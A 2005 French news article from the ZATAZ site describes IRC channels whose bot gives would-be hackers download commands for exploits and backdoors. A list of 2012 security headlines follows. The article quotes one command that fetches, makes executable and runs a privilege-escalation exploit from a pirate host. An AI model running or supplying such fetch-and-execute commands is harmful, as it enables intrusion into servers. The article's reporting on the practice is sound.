Publié le 30-08-2005 dans le thème Hacking

Pays : International - Auteur : Damien Bancal

Pub : Tous les logiciels antiphishing gratuits disponibles sur Internet

On connaissait les logiciels trouvés sur la toile qui permettaient de casser un mot de passe, d'espionner, dans certaines conditions, un internaute. Voici venir le chan IRC qui diffuse, à qui le souhaite, les méthodes, exploits et backdoors permettant le piratage. En un seul clic le massacre peut commencer. Par Damien Bancal

Ils s'appellent Piratax, Fr0z3nz, Stoopix, SlackWar3. Le point commun de ces internautes, ainsi que de plusieurs centaines d'autres est de se retrouver sur des chans IRC afin de récupérer des informations dédiées au piratage de serveurs Internet. Culture informatique proche du zéro, ils l'avouent eux-mêmes, ils n'ont jamais rien créé mais ont tous le même rêve : devenir un grand hacker. Pour espérer atteindre ce qui reste un éternel fantasme dans l'esprit d'une certaine catégorie d'internautes, il faut accéder aux exploits. Pour cela il y a deux contraintes : la première est de comprendre le code source de l'exploit utilisé et de le modifier à sa convenance si besoin est. La seconde est d'être capable d'utiliser un exploit publié (compilé parfois) afin de s'ouvrir les portes d'un serveur ou d'un site internet. Seulement aujourd'hui, il est possible de modifier une page web, ou d'accéder à un serveur dédié, sans même bouger le moindre petit neurone.

Pièges automatisés
Sur l'un des chans IRC découvert, le bot, un robot permettant d'automatiser certaines actions, est d'une gentillesse à toute épreuve. Selon les commandes envoyées, il propose l'exploit correspondant au mot-clé envoyé ainsi que les commandes à copier- coller pour utiliser celui-ci. Pour ce faire, le pirate qui a mis en place ce lieu de discussion particulier, a infiltré plusieurs serveurs web. Il y a placé des exploits publics, et certains privés, baptisés des "0days", qui permettent d'agir selon le mot-clé spécifié. "Ils vont télécharger des versions compilées d'un exploit, il ne reste plus qu'à l'exécuter, explique un utilisateur français. Moi, ça me permet de tenir à jour la base de données dédiée à la sécurité des clients de l'entreprise qui m'emploie." L'effet est effectivement saisissant.

Les pirates tapent par exemple une commande " !uselib ". Le bot du channel analyse dans sa base de données. Il recherche un exploit correspondant à ce service. Il n'en n'a pas, il renvoie évidemment une erreur. En revanche, dans le cas où il est en possession d'un exploit correspondant à ce service, il renvoie une ligne qui ressemble à celle-là : "wget www.sitepirate.com/0days/uselib; chmod 777 uselib ; ./uselib". Celui-ci communique l'endroit où est stocké l'exploit ainsi que la commande système pour le télécharger. Il permet de changer les droits de l'exploit une fois téléchargé, et donc de l'exécuter. Le pirate n'a donc plus qu'à copier cette ligne afin de devenir root, comprenez l'administrateur de la machine ciblée.

Le bot va nettement plus loin puisqu'il répond à la commande " !backdoor", il permet, une fois l'exploit téléchargé et exécuté, de refaire le même processus, cette fois avec les privilèges administrateurs pour installer une backdoor, comprenez une porte dérobée, afin de créer un accès sur la machine piratée. Cet accès va lui permettre d'y revenir plus tard. Cette backdoor est généralement en Perl ou compilée.

L'exemple "uselib" est assez probant, dans le sens où cet exploit existe vraiment pour la librairie en question. Il est donc possible d'utiliser l'exploit en 1 seconde en copiant les lignes données par le bot. Un accès de Calife à la place du Calife et cela en à peine 4 secondes.

"Ce genre d'espace est un véritable nid à pirates, explique John Jean, directeur de la société de sécurité informatique "Wargan solutions". En effet, la plupart des personnes exécutant ces binaires ne connaissent même pas le code source de ceux-ci, et encore moins leur fonctionnement. Il se peut qu'en créant un accès sur une machine, ils en créent également un à celui qui met à disposition ces binaires. Du piratage ou accès à un serveur à la portée de tous." Même plus besoin de réfléchir à l'acte. Seul le résultat compte. Une démocratisation du piratage qui risque d'entraîner des vagues d'arrestations dans les chambrées de ces internautes qui rêvaient tant d'être de grands pirates. "Avant, j'aidais les webmasters, explique l'un d'eux, Je n'avais même pas de merci. Aujourd'hui, au moins, je suis respecté". Le réveil risque d'être violent !

L´ANSSI recrute de manière originale

06-02-2012 à 19:16 - 0 commentaire(s)

INFO ZATAZ - L´Agence Nationale de la Sécurité des Système d'Information lance un recrutement fort sympathique pour les amateurs de chiffrement.

Nouvelle attaque à l´encontre des clients du Crédit Agricole

05-02-2012 à 10:43 - 0 commentaire(s)

INFO ZATAZ - Nouvelle tentative de vol de données bancaires appartenant aux clients de la banque française Crédit Agricole.

Sauvegarde des conversations téléphoniques pour France télévision

04-02-2012 à 11:42 - 0 commentaire(s)

INFO ZATAZ - Un document intéressant mis à jour sur Internet visant les sociétés souhaitant faire du business avec France Télévision.

Faille sur le site Wikileaks

04-02-2012 à 11:27 - 0 commentaire(s)

INFO ZATAZ - Une faille sur le site Wikileaks permet d´afficher n´importe quoi, donc de fausses informations, sur le portail international d´information.

Piège sur Facebook

04-02-2012 à 10:59 - 0 commentaire(s)

INFO ZATAZ - Un escroc se fait passer pour Coca Cola, sur Facebook, afin de mettre la main sur vos données privées.

Arnaque aux logements

04-02-2012 à 10:53 - 0 commentaire(s)

INFO ZATAZ - Depuis quelques heures, un escroc tente de louer de faux appartements en région parisienne. ZATAZ vous l´a délogé.

Une conférence téléphonique du FBI piratée par des Anonymous

04-02-2012 à 10:21 - 1 commentaire(s)

INFO ZATAZ - Une conférence téléphonique entre FBI et plusieurs polices européennes, dont la France, au sujet des Anonymous, interceptée.

La Ville de Chambéry corrige une fuite de données

04-02-2012 à 10:05 - 1 commentaire(s)

INFO ZATAZ - Avec l´aide du CERTA, le site Internet de la ville de Chambéry bouche une fuite de données concernant les administrés de cette commune Française.

Une conférence téléphonique du FBI piratée par des Anonymous

INFO ZATAZ - Une conférence téléphonique entre FBI et plusieurs polices européennes, dont la France, au sujet des Anonymous, interceptée.

Les emails du président syrien Bachar el-Assad piratés

Un hacker saoudien aurait réussi à pirater pour 4Go de données emails appartenant au président syrien Bachar el-Assad.

Le serveur Internet Citroen compromis

INFO ZATAZ - Mercredi soir, un pirate Turc a passé ses nerfs sur plusieurs espaces appartenant au constructeur automobile Citroën.

Le site pour adultes Brazzers... pompé de ses mots de passe

INFO ZATAZ - Un internaute découvre comment accèder aux données membres du site pour adultes Brazzers.

Le site modernisation.gouv.fr piraté par les Anonymous

INFO ZATAZ - Des anonymous modifient le site modernisation.gouv.fr. Pour les manifestants numériques, la modernisation passe par la compréhension de la technologie.

Attaque contre Sony à venir ?

INFO ZATAZ - Plus de 12.000 adresses IP appartenant à SONY diffusées. Une attaque de masse à venir ?

Piratage du site du Conseil Représentatif des Institutions juives

Un groupe de pirates informatiques du nom de French Cyber Army diffuse plusieurs bases de données appartenant au CRIF, Publicis et Unicef.

Sciences Po Paris piraté

Un groupe de pirates se faisant appeler French Cyber Army diffuse sur la toile une base de données appartenant à Sciences Po Paris.

Réagissez à ce contenu